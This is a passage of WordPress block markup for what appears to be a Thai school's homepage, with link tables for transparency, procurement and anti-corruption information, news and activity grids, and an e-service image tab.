900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout 